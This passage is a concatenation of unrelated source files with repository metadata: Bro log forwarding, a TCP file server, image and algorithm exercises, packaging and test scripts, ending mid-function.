# print gene
typ = gene[0]
name = gene[1]
subtype = gene[2]
strandcol = gene[3]
if strandcol == "ProperStrand":
if typ=="protein_coding" or typ=="lincRNA":
if typ in P_dic:
P_dic[typ].append([typ,name,subtype,strandcol])
else:
P_dic[typ]=[[typ,name,subtype,strandcol]]
elif typ=="rRNA_repeat" or typ=="rRNA":
if "rRNA" in P_dic:
P_dic["rRNA"].append([typ,name,subtype,strandcol])
else:
P_dic["rRNA"]=[[typ,name,subtype,strandcol]]
elif typ=="snoRNA" or typ=="miRNA" or typ=="snRNA":
if "short_nc" in P_dic:
P_dic["short_nc"].append([typ,name,subtype,strandcol])
else:
P_dic["short_nc"]=[[typ,name,subtype,strandcol]]
else:
if "other" in P_dic:
P_dic["other"].append([typ,name,subtype,strandcol])
else:
P_dic["other"]=[[typ,name,subtype,strandcol]]
elif strandcol == "NonProperStrand":
if typ=="protein_coding" or typ=="lincRNA":
if typ in N_dic:
N_dic[typ].append([typ,name,subtype,strandcol])
else:
N_dic[typ]=[[typ,name,subtype,strandcol]]
elif typ=="rRNA_repeat" or typ=="rRNA":
if "rRNA" in N_dic:
N_dic["rRNA"].append([typ,name,subtype,strandcol])
else:
N_dic["rRNA"]=[[typ,name,subtype,strandcol]]
elif typ=="snoRNA" or typ=="miRNA" or typ=="snRNA":
if "short_nc" in N_dic:
N_dic["short_nc"].append([typ,name,subtype,strandcol])
else:
N_dic["short_nc"]=[[typ,name,subtype,strandcol]]
else:
if "other" in N_dic:
N_dic["other"].append([typ,name,subtype,strandcol])
else:
N_dic["other"]=[[typ,name,subtype,strandcol]]
##select optimized annotation
if P_dic:
[ftyp,fname,fsubtype,fstrandcol] = optimize_annotation(P_dic,bed,ref_detail)
if ftyp=="" and N_dic:
[ftyp,fname,fsubtype,fstrandcol] = optimize_annotation(N_dic,bed,ref_detail)
if ftyp=="":
max_overlap=0
#typ=="non" try repeat masker
#we are not using any stringent threshold here. According to the annotation, different types of repeat element, such as LINE and SINE, are (usually) exclusive.
#For example, if one element is annotated as LINE, it won't be SINE at the same time.
for hit in ref_repeat.query(bed):
overlap = min(hit.stop,bed.stop)-max(hit.start,bed.start)
if overlap > max_overlap and overlap >= Perc_overlap * bed_len:
max_overlap=overlap
tempname=hit.id.split("&")
name = tempname[0]
typ = tempname[1]
subtype = tempname[2]
if not IsProperStrand(hit, bed):
strandcol = "NonProperStrand"
else:
strandcol = "ProperStrand"
if max_overlap>0:
ftyp=typ
fname=name
fsubtype=subtype
fstrandcol=strandcol
else:
ftyp="non"
fname="."
fsubtype="."
fstrandcol="ProperStrand"
return [ftyp,fname,fsubtype,fstrandcol]
| Zhong-Lab-UCSD/MARIO | src/AnnoMax/__init__.py | __init__.py | py | 16,575 | python | en | code | 0 | github-code | 36 |
14919660857 | #!/usr/bin/env python
# Brocapi RQ Worker
__copyright__ = """
Copyright 2017 FireEye, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__license__ = "Apache 2.0"
import glob
import logging
import os
import subprocess
import brocapi_syslog
TYPE_BLACKLIST = [
"capture_loss",
"stats",
"loaded_scripts",
"packet_filter"
]
def process_job(job_uuid, job_tag, pcaps, bro_bin,
                bro_processing_dir, syslog_host, syslog_port,
                syslog_proto, syslog_prefix):
    """Run Bro over each pcap of one job and forward the resulting logs to syslog.

    :param job_uuid: unique id of the job; also names the per-job work directory
    :param job_tag: tag prepended to each syslog message (defaults to "brocapi")
    :param pcaps: list of pcap file names belonging to the job
    :param bro_bin: path to the Bro executable
    :param bro_processing_dir: base directory holding per-job work directories
    :param syslog_host: destination syslog hostname
    :param syslog_port: destination syslog port
    :param syslog_proto: syslog transport protocol
    :param syslog_prefix: program-name format string, filled with the Bro log type
    :returns: False on failure, None on success (original contract preserved)
    """
    logging.info("Received job: %s", job_uuid)
    # Default the tag once, up front, instead of re-checking it per log line
    # (the original re-tested and reassigned job_tag inside the inner loop).
    if job_tag is None:
        job_tag = "brocapi"
    bro_log_dir = bro_processing_dir + job_uuid + "/logs/bro/"
    logging.info("Moving into Bro log dir: %s", bro_log_dir)
    os.chdir(bro_log_dir)
    for pcap in pcaps:
        pcap_path = bro_processing_dir + job_uuid + '/pcaps/' + pcap
        logging.debug("Calling bro for pcap %s as part of job %s", pcap_path, job_uuid)
        try:
            # -C: ignore bad checksums; -r: read from pcap; "local" policy script
            subprocess.call([
                bro_bin,
                "-C",
                "-r",
                pcap_path,
                "local"])
        except Exception as e:
            logging.error("Bro processing failed for pcap %s", pcap)
            logging.error(e)
    # Get all the relevant bro logs in the dir (we chdir'd into it above)
    bro_logs = glob.glob('*.log')
    logging.debug("Found bro logs: %s", str(bro_logs))
    if len(bro_logs) == 0:
        logging.error("No bro logs present for job %s", job_uuid)
        return False
    # Connect to syslog server
    logging.debug("Creating a syslog broker socket to %s:%s over %s for job %s", syslog_host, syslog_port, syslog_proto, job_uuid)
    broker_socket = brocapi_syslog.connect_syslog(syslog_host, syslog_port, syslog_proto)
    if not broker_socket:
        return False
    try:
        # Loop through all log types
        for _log in bro_logs:
            logging.debug("Processing log %s for job %s", _log, job_uuid)
            bro_type = _log.split(".")[0]
            if bro_type in TYPE_BLACKLIST:
                logging.debug("Skipping blacklisted type %s for job %s", bro_type, job_uuid)
                continue
            syslog_program = syslog_prefix % bro_type
            # handle every line in the log file
            with open(_log) as bro_file:
                for line in bro_file:
                    if line.startswith("#"):
                        continue  # Bro header/metadata lines
                    syslog_message = brocapi_syslog.format_syslog_message(job_tag, syslog_program, line)
                    broker_socket.send(syslog_message)
    finally:
        # Always release the socket, even if sending fails part-way through
        # (the original leaked it on any exception in the loop above).
        broker_socket.close()
| fireeye/brocapi | brocapi/brocapi_worker.py | brocapi_worker.py | py | 3,053 | python | en | code | 27 | github-code | 36 |
6964149884 | # 多线程,并发服务器
from socket import *
from threading import *
from TCPpack import recvall,get_block,put_block
def get_filecontent(fileName, base_dir='D:/TCPfiletransport/'):
    """Read a file from the server's share directory and return its bytes.

    :param fileName: name of the requested file (relative to base_dir)
    :param base_dir: directory the server shares files from; new optional
        parameter that defaults to the previously hard-coded location, so
        existing callers are unaffected
    :returns: file content as bytes, or None if the file cannot be found
    """
    # NOTE(review): fileName comes straight from the client and is joined
    # onto base_dir unsanitized, so "../" path traversal is possible --
    # confirm clients are trusted before exposing this more widely.
    try:
        with open(base_dir + fileName, "rb") as f:
            return f.read()
    except FileNotFoundError:
        print("没有找到文件")
        return None
def handle(client_socket):
    """Serve one client's download requests until it sends 'quit'.

    :param client_socket: the accepted TCP socket for this client
    """
    print("有新的客户端建立连接")
    while True:  # keep serving download requests from this client
        # Receive the requested file name from the client
        recv_data = client_socket.recv(1024).decode('utf-8')
        # Client asked to disconnect
        if recv_data == 'quit':
            client_socket.close()
            print("有一个客户端已退出")
            break
        print("客户端请求下载的文件名为:" + recv_data)
        # Read the file exactly once (the original called get_filecontent
        # twice per request, reading the file from disk two times).
        myfile = get_filecontent(recv_data)
        if myfile:
            put_block(client_socket, myfile)
        else:
            # An empty payload signals "file not found" to the client
            put_block(client_socket, ''.encode("utf-8"))
def main():
    """Accept TCP clients on port 8889 and hand each one to a worker thread."""
    server = socket(AF_INET, SOCK_STREAM)
    # Allow quick restarts without "address already in use" errors
    server.setsockopt(SOL_SOCKET, SO_REUSEADDR, True)
    address = ('', 8889)  # bind on all interfaces
    server.bind(address)
    # Switch the socket from active to passive mode so it can accept
    # client connections; 128 is the accept backlog.
    server.listen(128)
    while True:
        # Each accepted connection yields a new per-client socket; the
        # listening socket keeps waiting for further clients.
        client_socket, client_addr = server.accept()
        # daemon=True so worker threads don't block interpreter shutdown.
        # (Thread.setDaemon() is deprecated in favor of the constructor arg.)
        thread = Thread(target=handle, args=(client_socket,), daemon=True)
        thread.start()
if __name__ == '__main__':
main() | laputae/TCPdownload | Server2.py | Server2.py | py | 2,368 | python | zh | code | 0 | github-code | 36 |
40107696527 | import numpy as np
import cv2 as cv
flower2 = "../mysamples/flower2.jpg"
# flower2 = "/home/mmni/projects/opencv-python/mysamples/flower2.jpg"

img = cv.imread(flower2)
# cv.imread returns None (no exception) when the path is wrong; fail fast
# with a clear message instead of a cryptic slicing error below.
if img is None:
    raise SystemExit("could not read image: " + flower2)

# Copy a 200x200 pixel region of flowers and paste it elsewhere in the image.
someflowers = img[2000:2200, 2300:2500]
# someflowers = img[200:400, 600:800]
img[100:300, 200:400] = someflowers

cv.imshow("flowers", img)
cv.imshow("flowers some", someflowers)
# Wait up to 150 seconds for a key press before closing the windows.
cv.waitKey(150000)
cv.destroyAllWindows()
950208402 | pkgname = "giflib"
pkgver = "5.2.1"
pkgrel = 0
build_style = "makefile"
make_cmd = "gmake"
hostmakedepends = ["gmake", "xmlto"]
pkgdesc = "Library to handle, display and manipulate GIFs"
maintainer = "q66 <q66@chimera-linux.org>"
license = "MIT"
url = "https://sourceforge.net/projects/giflib"
source = f"$(SOURCEFORGE_SITE)/{pkgname}/{pkgname}-{pkgver}.tar.gz"
sha256 = "31da5562f44c5f15d63340a09a4fd62b48c45620cd302f77a6d9acf0077879bd"
tool_flags = {"CFLAGS": ["-fPIC"]}
def post_install(self):
    # Ship the MIT license text with the packaged files.
    self.install_license("COPYING")
# cports subpackage hooks: each returns the default file list for its split.
@subpackage("giflib-devel")
def _devel(self):
    # Development files (headers, pkg-config data, .so symlinks).
    return self.default_devel()
@subpackage("giflib-progs")
def _progs(self):
    # Command-line GIF utilities built alongside the library.
    return self.default_progs()
| chimera-linux/cports | main/giflib/template.py | template.py | py | 695 | python | en | code | 119 | github-code | 36 |
28513694147 | # Opus/UrbanSim urban simulation software.
# Copyright (C) 2010-2011 University of California, Berkeley, 2005-2009 University of Washington
# See opus_core/LICENSE
import os
import shutil
from opus_core.resources import Resources
from abstract_emme2_travel_model import AbstractEmme2TravelModel
class RestoreTripTables(AbstractEmme2TravelModel):
    """Copy original trip tables into the travel model's 'triptabs' directory.

    Any existing 'triptabs' directory is preserved as 'triptabs.last'
    before being replaced.
    """
    def run(self, config, source_directory, year):
        """Replace 'triptabs' with the tables found in source_directory.

        config and year are accepted for interface compatibility with the
        caller but are not used by this operation.
        """
        base_dir = self.get_emme2_base_dir()
        target_dir = os.path.join(base_dir, 'triptabs')
        source_dir = os.path.join(base_dir, source_directory)
        backup_dir = os.path.join(base_dir, 'triptabs.last')
        # Drop any stale backup left over from a previous run.
        if os.path.exists(backup_dir):
            shutil.rmtree(backup_dir)
        # Keep the current tables as a backup, then clear the target.
        if os.path.exists(target_dir):
            shutil.copytree(target_dir, backup_dir)
            shutil.rmtree(target_dir)
        shutil.copytree(source_dir, target_dir)
shutil.copytree(src, dst)
if __name__ == "__main__":
    # Optional debugger hook; swallow only a failed import, not all errors
    # (the original bare `except:` hid every exception type).
    try:
        import wingdbstub
    except ImportError:
        pass
    from optparse import OptionParser
    from opus_core.file_utilities import get_resources_from_file
    parser = OptionParser()
    parser.add_option("-r", "--resources", dest="resources_file_name", action="store", type="string",
                      help="Name of file containing resources")
    parser.add_option("-y", "--year", dest="year", action="store", type="int",
                      help="Year for which the emme2 directory is defined in the configuration.")
    parser.add_option("-d", "--directory", dest="directory", action="store", type="string", default="triptabs.org",
                      help="Name of sub-directory containing original trip tables (relative to the emme2 directory).")
    (options, args) = parser.parse_args()
    # Read the resources file once (the original read it twice and left the
    # first result in an unused variable).
    resources = Resources(get_resources_from_file(options.resources_file_name))
    RestoreTripTables().run(resources, options.directory, options.year)
| psrc/urbansim | opus_emme2/models/restore_trip_tables.py | restore_trip_tables.py | py | 2,003 | python | en | code | 4 | github-code | 36 |
8436779783 | # Given an array of positive numbers and a positive number ‘k,’ find the maximum sum of any contiguous subarray of size ‘k’.
def find_max_sum(arr, k):
    """Return the maximum sum of any contiguous subarray of size k.

    Assumes arr contains positive numbers and 1 <= k <= len(arr); returns
    0 for an empty array. Fix: the running total was named `sum`, which
    shadowed the builtin for the whole function body.
    """
    window_sum = 0
    max_sum = 0
    for i in range(len(arr)):
        window_sum += arr[i]
        if i > k - 1:
            # Slide the window: drop the element that fell off the left edge
            window_sum -= arr[i - k]
        max_sum = max(max_sum, window_sum)
    return max_sum
#Given an array of positive numbers and a positive number ‘S,’ find the length of the smallest contiguous subarray whose sum is greater than or equal to ‘S’. Return 0 if no such subarray exists.
def smallest_subarray_with_sum(arr, target):
    """Return the length of the smallest contiguous subarray of positive
    numbers whose sum is >= target, or 0 if no such subarray exists.

    Fixes in this revision:
      * the running total was never initialized (`sum += arr[i]` clobbered
        the builtin and raised TypeError on the first iteration)
      * the window shrank only on strictly greater sums; the spec asks for
        "greater than or equal to S"
      * 0 is now returned when no qualifying subarray exists (the original
        returned len(arr))
    """
    window_sum = 0
    left = 0
    min_length = math.inf
    for i in range(len(arr)):
        window_sum += arr[i]
        # Shrink from the left while the window still satisfies the target
        while window_sum >= target:
            min_length = min(min_length, i - left + 1)
            window_sum -= arr[left]
            left += 1
    return 0 if min_length == math.inf else min_length
from collections import Counter
# Given a string, find the length of the longest substring in it with no more than K distinct characters.
def longest_substring_with_k_distinct_characters(s, k):
    """Return the length of the longest substring of s containing no more
    than k distinct characters (classic shrinking-window technique)."""
    window_counts = Counter()
    distinct_chars = 0
    start = 0
    best = 0
    for end, ch in enumerate(s):
        if window_counts[ch] == 0:
            distinct_chars += 1
        window_counts[ch] += 1
        # Too many distinct characters: advance the left edge until valid
        while distinct_chars > k:
            left_ch = s[start]
            window_counts[left_ch] -= 1
            if window_counts[left_ch] == 0:
                del window_counts[left_ch]
                distinct_chars -= 1
            start += 1
        best = max(best, end - start + 1)
    return best
# Given a string, find the length of the longest substring, which has no repeating characters.
def longest_length_with_unique_characters(s):
    """Return the length of the longest substring of s with no repeating
    characters, using a last-seen-index sliding window."""
    last_seen = {}  # char -> index of its most recent occurrence
    window_start = 0
    best = 0
    for idx, ch in enumerate(s):
        # If ch occurred inside the current window, jump the window past it
        if ch in last_seen and last_seen[ch] >= window_start:
            window_start = last_seen[ch] + 1
        best = max(best, idx - window_start + 1)
        last_seen[ch] = idx
    return best
# Longest Substring with Same Letters after Replacement
# Given a string with lowercase letters only, if you are allowed to replace no more than ‘k’ letters with any letter,
# find the length of the longest substring having the same letters after replacement.
def find_longest_substring_with_same_characters_after_k_replacements(s, k):
    """Return the length of the longest substring obtainable by replacing at
    most k characters so the whole substring becomes one repeated letter.

    Fixes in this revision:
      * the shrink test compared `i - l` (window length minus one) against
        max_count, so windows needing k+1 replacements were accepted
        (e.g. ("aabccbb", 2) returned 6; the correct answer is 5)
      * max_count was only updated for repeat occurrences, never from a
        character's first occurrence
    """
    char_count = {}
    max_repeat = 0   # highest single-character count seen in any window
    left = 0
    best = 0
    for right, ch in enumerate(s):
        char_count[ch] = char_count.get(ch, 0) + 1
        max_repeat = max(max_repeat, char_count[ch])
        # Characters to replace = window length - count of the dominant char;
        # shrink until at most k replacements are needed.
        while (right - left + 1) - max_repeat > k:
            char_count[s[left]] -= 1
            left += 1
        best = max(best, right - left + 1)
    return best
# Given an array containing 0s and 1s, if you are allowed to replace no more than ‘k’ 0s with 1s, find the length of the longest contiguous subarray having all 1s.
def find_length_of_array_having_ones_with_k_replacements(arr, k):
    """Return the length of the longest contiguous run of 1s achievable by
    replacing at most k zeros with ones.

    Fixes in this revision:
      * the shrink test compared `i - left` (window length minus one), so
        windows containing k+1 zeros were accepted
        (e.g. ([0,1,1,0,0], 1) returned 4; the correct answer is 3)
      * removed the `zeros` counter, which was incremented but never read
    """
    left = 0
    ones_in_window = 0
    best = 0
    for right, value in enumerate(arr):
        if value == 1:
            ones_in_window += 1
        # zeros in window = window length - ones; keep that at most k
        while (right - left + 1) - ones_in_window > k:
            if arr[left] == 1:
                ones_in_window -= 1
            left += 1
        best = max(best, right - left + 1)
    return best
def permutation_in_a_string(s, perm):
    """Return True if s contains any permutation of perm as a substring,
    otherwise False.

    Fixes in this revision:
      * the sliding window removed counts keyed by the *index* leaving the
        window instead of the character at that index
      * the window was shrunk one position too early (`i >= len(perm) - 1`)
      * a False result is now returned explicitly (the original fell off
        the end and returned None)
    """
    window = len(perm)
    if window > len(s):
        return False
    p_count = Counter(perm)
    s_count = Counter(s[:window])
    if s_count == p_count:
        return True
    for i in range(window, len(s)):
        s_count[s[i]] += 1
        outgoing = s[i - window]
        s_count[outgoing] -= 1
        if s_count[outgoing] == 0:
            del s_count[outgoing]   # keep the Counter comparable to p_count
        if s_count == p_count:
            return True
    return False
import math
def min_window_substring(s, t):
    """Return the smallest substring of s containing every character of t
    (with multiplicity), or "" if none exists.

    Fixes in this revision:
      * duplicate characters in t were mishandled: a character's count was
        deleted once satisfied and could never be restored while shrinking,
        which let the shrink loop run off the end of s (IndexError)
      * the returned slice used an exclusive end and dropped the window's
        last character
    """
    need = Counter(t)
    missing = len(t)               # total character occurrences still required
    left = 0
    best_start, best_end = 0, -1   # best window found so far (inclusive)
    for right, ch in enumerate(s):
        if need[ch] > 0:
            missing -= 1           # this occurrence satisfies a requirement
        need[ch] -= 1              # surplus occurrences go negative
        while missing == 0:
            if best_end < 0 or right - left < best_end - best_start:
                best_start, best_end = left, right
            # Give the leftmost character back and advance the window
            need[s[left]] += 1
            if need[s[left]] > 0:
                missing += 1       # we just lost a required character
            left += 1
    return "" if best_end < 0 else s[best_start:best_end + 1]
def check_if_word_concatenation_of_substrings(s, words):
    """Return the starting indices in s at which some concatenation of every
    word in words (each used exactly once, in any order) begins.

    All words are assumed to have equal length. This revision removes the
    debug prints left in the original and rebuilds the per-window Counter
    with a single comprehension-free loop.
    """
    if not s or not words:
        return []
    word_count = Counter(words)
    unit = len(words[0])
    total_len = unit * len(words)
    result = []
    for start in range(len(s) - total_len + 1):
        seen = Counter()
        for pos in range(start, start + total_len, unit):
            chunk = s[pos:pos + unit]
            if chunk not in word_count:
                break
            seen[chunk] += 1
            if seen[chunk] > word_count[chunk]:
                break   # chunk used more times than it is available
        else:
            # Every chunk matched within its allowed multiplicity
            result.append(start)
    return result
if __name__ == '__main__':
print(check_if_word_concatenation_of_substrings("wordgoodgoodgoodbestword", ["word","good","best","good"]))
print(check_if_word_concatenation_of_substrings("bagfoxcat", ["cat", "fox"]))
print(check_if_word_concatenation_of_substrings("barfoothefoobarman", ["foo", "the"]))
print(check_if_word_concatenation_of_substrings("barfoofoobarthefoobarman", ["bar","foo","the"])) | kashyapa/coding-problems | april19th/sliding-window/sliding_window.py | sliding_window.py | py | 5,992 | python | en | code | 0 | github-code | 36 |
14516098985 | import random
import time
import sys
print(sys.setrecursionlimit(3000))
def partition(A, p, r, q):
    """Lomuto partition of A[p..r] around the value at index q; returns the
    pivot's final index.

    Fix: the original read the pivot value from A[q] but never moved it to
    the end, so the final swap placed A[r] -- not the pivot -- between the
    halves; it was only correct when q == r. The pivot is now swapped to
    A[r] first (a no-op when q == r, so that case is unchanged).
    """
    A[q], A[r] = A[r], A[q]          # move the pivot out of the way
    pivot = A[r]
    i = p - 1
    for j in range(p, r):
        if A[j] <= pivot:
            i += 1
            A[i], A[j] = A[j], A[i]
    A[i + 1], A[r] = A[r], A[i + 1]  # place the pivot between the halves
    return i + 1
def quicksort_last(A):
    """Sort A in place with quicksort, always using the last element of the
    current subrange as the pivot (worst case O(n^2) on sorted input)."""
    def _sort(lo, hi):
        if lo < hi:
            split = partition(A, lo, hi, hi)
            _sort(lo, split - 1)
            _sort(split + 1, hi)
    _sort(0, len(A) - 1)
list1=[1488, 88, 420, 69, 14, 666]
def quicksort_random(A):
    """Sort A in place with quicksort, using a median-of-three pivot drawn
    from random positions of the current subrange.

    Fixes in this revision:
      * the size test was `(p - r) > 2`, which is never true since p < r,
        so the median-of-three branch never executed and the sort silently
        degraded to last-element pivoting
      * random indices are now drawn from the subrange [p, r] and the
        chosen pivot is swapped to position r before partitioning
        (`A.index(value)` searched the whole list and could return an
        index outside the subrange)
    """
    def _sort(p, r):
        if p < r:
            if r - p > 2:
                # Median of three distinct random positions in [p, r]
                picks = sorted(random.sample(range(p, r + 1), 3),
                               key=lambda idx: A[idx])
                pivot_idx = picks[1]
            else:
                pivot_idx = r
            # partition() expects the pivot at the end of the subrange
            A[pivot_idx], A[r] = A[r], A[pivot_idx]
            split = partition(A, p, r, r)
            _sort(p, split - 1)
            _sort(split + 1, r)
    _sort(0, len(A) - 1)
list_sizes=[10, 100, 200, 500, 1000, 1500, 2000]
def generate_sorted_list(size):
    """Return the ascending list [0, 1, ..., size-1]."""
    return list(range(size))
def generate_random_list(size):
    """Return a list of `size` random integers drawn uniformly from [0, 1000]."""
    return [random.randint(0, 1000) for _ in range(size)]
def test_time(func, input):
x=time.time()
func(input)
y=time.time()
return y-x
# Benchmark version 1 (last-element pivot) on sorted vs. random inputs.
# NOTE(review): the local name `sorted` shadows the builtin sorted() for
# the remainder of the script -- consider renaming it.
for size in list_sizes:
    sorted=generate_sorted_list(size)
    random_l=generate_random_list(size)
    t1=test_time(quicksort_last, sorted)
    t2=test_time(quicksort_last, random_l)
    print("Runtime for list of size {} using version 1 is {} for a sorted list and {} for a random list.".format(size, t1, t2))
# Benchmark version 2 (random median-of-three pivot) on the same input shapes.
for size in list_sizes:
    sorted=generate_sorted_list(size)
    random_l=generate_random_list(size)
    t1=test_time(quicksort_random, sorted)
    t2=test_time(quicksort_random, random_l)
    print("Runtime for list of size {} using version 2 is {} for a sorted list and {} for a random list.".format(size, t1, t2))
| byama382/3500-hw | 3500hw7.py | 3500hw7.py | py | 2,222 | python | en | code | 0 | github-code | 36 |
34821999765 | t = int(input())
for _ in range(t):
l1, l2, l3 = list(map(int, input().split()))
p, r = divmod(l1 + l2 + l3, 2)
if r != 0:
print("NO")
else:
if (l1 == l2 and (l3 % 2 == 0)) or (l1 == l3 and (l2 % 2 == 0)) or (l2 == l3 and (l1 % 2 == 0)):
print("YES")
elif (l1 + l2 == l3) or (l1 + l3 == l2) or (l2 + l3 == l1):
print("YES")
else:
print("NO")
| easimonenko/codeforces-problems-solutions | contest-1622-educational-120/a.py | a.py | py | 427 | python | en | code | 1 | github-code | 36 |
72166992744 | import datetime
def get_period(start_day: str, n_days: int) -> list:
    """Return n_days date strings walking backwards one day at a time.

    :param start_day: 'YYYY-MM-DD' anchor date (included as the first entry)
    :param n_days: how many consecutive dates to produce
    :returns: list of 'YYYY-MM-DD' strings, newest first
    """
    anchor = datetime.datetime.strptime(start_day, '%Y-%m-%d')
    return [(anchor - datetime.timedelta(days=offset)).strftime('%Y-%m-%d')
            for offset in range(n_days)]
def convert_datetime(df, sin_cos=False):
    """Derive hour / weekday / day columns from df.created_ts, optionally
    sin/cos-encoding each cyclic feature.

    Relies on module-level helpers get_hour / get_weekday / get_day,
    sin_cos_encoding and the `tests` shape-check module (defined elsewhere
    in this project).
    """
    start_time = time.time()
    shape_before = df.shape
    print("datetime conversion started...")
    # Extract the three cyclic time features from the timestamp column.
    df['hour'] = df.created_ts.apply(get_hour)
    df['weekday'] = df.created_ts.apply(get_weekday)
    df['day'] = df.created_ts.apply(get_day)
    if sin_cos:
        # Each feature becomes a (sin, cos) pair, hence 3*2 new columns.
        for column, period in (('hour', 24), ('weekday', 7), ('day', 30)):
            df = sin_cos_encoding(df, column, period)
        tests.test_df_shape(shape_before, 3*2, df.shape)
    else:
        tests.test_df_shape(shape_before, 3, df.shape)
    print(f"datetime conversion completed, time : {int(time.time() - start_time)}s")
    return df
def dt_string_converter(df, dt_column, fmt="datetime"):
    """Convert a DataFrame column between datetime objects and strings.

    :param df: the DataFrame holding the column (mutated in place)
    :param dt_column: name of the column to convert
    :param fmt: target representation, "datetime" or "string"
    :returns: df, with dt_column converted when its dtype required it
    """
    fmt_pattern = "%Y-%m-%d %H:%M:%S"
    if fmt == "datetime" and df[dt_column].dtype == "object":
        df[dt_column] = df[dt_column].apply(
            lambda v: datetime.datetime.strptime(v, fmt_pattern))
    elif fmt == "string" and df[dt_column].dtype == "<M8[ns]":
        df[dt_column] = df[dt_column].apply(
            lambda v: datetime.datetime.strftime(v, fmt_pattern))
    # Sanity-check the resulting dtype; warn (don't raise) on mismatch,
    # matching the original best-effort behavior. An unknown fmt still
    # raises KeyError here, exactly as before.
    expected_dtype = {"datetime": "<M8[ns]", "string": "object"}[fmt]
    if df[dt_column].dtype != expected_dtype:
        print(f"datetime string converter failed")
    return df
| qCircuit/unos_scripts | datetime.py | datetime.py | py | 1,675 | python | en | code | 0 | github-code | 36 |
4778228979 | from pathlib import Path
import re
import subprocess
import numpy as np
import pytest
from transformer_engine.paddle.fp8 import is_fp8_available
test_root = Path(__file__).resolve().parent
is_fp8_supported, reason = is_fp8_available()
@pytest.mark.skipif(not is_fp8_supported, reason=reason)
@pytest.mark.parametrize('use_reentrant', [False, True])
def test_transformer_encoder_recompute(use_reentrant):
    """
    Test TransformerLayer encoder recompute: running with activation
    recompute must lower peak memory while leaving the loss unchanged.
    """
    rtol = 1e-5
    atol = 1e-5

    def launch_subprocess_and_check_output(enable_recompute):
        """Launch training in subprocess and parse its loss / peak memory."""
        try:
            cmd = [
                'python',
                str(test_root / 'recompute_tests' / 'recompute_transformer_encoder.py'),
                str(int(enable_recompute)),
                str(int(use_reentrant))
            ]
            result = subprocess.check_output(cmd, stderr=subprocess.STDOUT, universal_newlines=True)
            print(result)
            loss_match = re.search(r'Loss:\s+(-?\d+\.\d+)', result)
            memory_match = re.search(r'Peak memory:\s+(\d+)', result)
            # Fail with a clear message if the training script's output format
            # changed (re.search returns None on no match, which previously
            # surfaced as an opaque AttributeError on .group()).
            if loss_match is None or memory_match is None:
                raise ValueError(f"Could not parse Loss/Peak memory from output:\n{result}")
            loss_value = float(loss_match.group(1))
            memory_value = int(memory_match.group(1))
            return loss_value, memory_value
        except subprocess.CalledProcessError as e:
            raise ValueError(f"Subprocess failed with error: {e}") from e

    loss_recompute, peak_memory_recompute = launch_subprocess_and_check_output(True)
    loss_ref, peak_memory_ref = launch_subprocess_and_check_output(False)
    # Recompute trades compute for memory: peak memory must drop while the
    # loss stays numerically identical within tolerance.
    assert peak_memory_recompute < peak_memory_ref
    np.testing.assert_allclose(loss_recompute, loss_ref, rtol=rtol, atol=atol)
| NVIDIA/TransformerEngine | tests/paddle/test_recompute.py | test_recompute.py | py | 1,707 | python | en | code | 1,056 | github-code | 36 |
10528036794 | import random
IMG_ONLY_TRANSFORM = 1
MASK_ONLY_TRANSFORM = 2
JOINT_TRANSFORM = 3
RANDOM_JOINT_TRANSFORM_WITH_BORDERS = 4 # joint with randomness inside the transform that affect borders
BORDER_ONLY_TRANSFORM = 5
JOINT_TRANSFORM_WITH_BORDERS = 6
# ad hoc transform classes from https://github.com/ycszen/pytorch-seg/blob/master/transform.py
# joint transformations for image and mask
class JointCompose(object):
    """Compose image/mask/border transforms, dispatching each one according
    to its declared transform_type and optional application probability.

    Each entry of transforms_specs provides: .transform (the callable),
    .transform_type (one of the *_TRANSFORM constants above) and .prob
    (None to always apply, otherwise a probability in [0, 1]).
    """
    def __init__(self, transforms_specs):
        self.transforms_specs = transforms_specs
    def __call__(self, sample):
        # sample is a dict; any of these entries may be absent (None).
        img = sample.get('img')
        mask = sample.get('binary_mask')
        borders = sample.get('borders')
        for transform_spec in self.transforms_specs:
            transform = transform_spec.transform
            transform_type = transform_spec.transform_type
            prob = transform_spec.prob
            # check if to apply the transform, in case of a probabilistic one
            apply_transform = True
            if prob is not None: # probabilistic transform
                if random.random() > prob:
                    apply_transform = False
            if apply_transform:
                # First group: transforms that act at least on the image.
                if transform_type == IMG_ONLY_TRANSFORM:
                    img = transform(img)
                elif transform_type == JOINT_TRANSFORM:
                    img = transform(img)
                    if mask is not None:
                        mask = transform(mask)
                elif transform_type == JOINT_TRANSFORM_WITH_BORDERS:
                    img = transform(img)
                    if mask is not None:
                        mask = transform(mask)
                    borders = transform(borders)
                # Second group: mask-dependent transforms.
                # NOTE(review): BORDER_ONLY_TRANSFORM (and RANDOM_JOINT_*)
                # are skipped entirely when mask is None -- confirm a
                # border-only transform is really meant to require a mask.
                if mask is not None:
                    if transform_type == MASK_ONLY_TRANSFORM:
                        mask = transform(mask)
                    elif transform_type == RANDOM_JOINT_TRANSFORM_WITH_BORDERS:
                        # Randomness lives inside the transform; it must see
                        # img, mask and borders together to stay consistent.
                        img, mask, borders = transform(img, mask, borders)
                    elif transform_type == BORDER_ONLY_TRANSFORM:
                        borders = transform(borders)
        # Write the (possibly replaced) tensors back into the sample dict.
        sample['img'] = img
        sample['binary_mask'] = mask
        sample['borders'] = borders
        return sample
| yolish/kaggle-dsb18 | JointCompose.py | JointCompose.py | py | 2,226 | python | en | code | 0 | github-code | 36 |
71335872103 | ## Method 1 to solve the problem by using some extra memory.
def m1(mat):
    """Return the transpose of mat as a brand-new matrix.

    Uses O(n*m) extra space; works for rectangular matrices.
    """
    n_rows = len(mat)
    n_cols = len(mat[0])
    return [[mat[r][c] for r in range(n_rows)] for c in range(n_cols)]
mat = [[1 ,2, 3, 4],
[5, 6, 7, 8,],
[9, 10, 11, 12],
[13 ,14 ,15 ,16]]
print(m1(mat))
## But method 1 uses extra memory can we do it without extra space???
## Method 2 , Trying to do it in-place.
def m2(mat):
    """Transpose a *square* matrix in place and return it (O(1) extra space).

    Each element above the diagonal is swapped with its mirror below it.
    Fix: the original crashed with a bare IndexError on non-square input
    (and on an empty matrix via len(mat[0])); the square precondition is
    now checked explicitly.
    """
    n = len(mat)
    if any(len(row) != n for row in mat):
        raise ValueError("in-place transpose requires a square matrix")
